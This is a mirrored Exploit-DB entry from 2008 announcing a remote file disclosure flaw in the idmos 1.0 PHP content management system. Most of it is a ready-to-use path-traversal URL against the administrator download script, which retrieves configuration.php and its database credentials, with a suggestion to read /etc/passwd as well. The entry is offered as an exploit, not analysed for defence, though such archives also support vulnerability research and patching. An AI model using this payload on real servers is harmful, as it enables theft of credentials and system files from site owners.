bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/4954.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

28 lines
No EOL
1.1 KiB
Text
Raw Blame History

--==+================================================================================+==--
--==+ idmos1.0 Remote File Discolousure Vulnerability +==--
--==+================================================================================+==--
Author: MhZ91
Title: Remote File Discolusure Vulnerability
Download: http://sourceforge.net/project/showfiles.php?group_id=188355 idmos1.0
Bug: Remote File Discolousure Vulnerability
Info: IDMOS is a CMS (Content Management System) that fill all requirements in IDM Method. It provides dynamic front-end and administrative tools. Multilanguage, template-based, component-base, it is written in PHP and uses MySQL as DB.
Visit: http://www.inj3ct-it.org
[*]----------------------------------------------------------
We can download file present on the server... for example we can get the file of db credentials, configuration.php
Exploit:
http://[www.example.com]/administrator/download.php?fileName=../configuration.php
or try to get /etc/passwd :)
[*]----------------------------------------------------------
# milw0rm.com [2008-01-21]
Reference in a new issue View git blame Copy permalink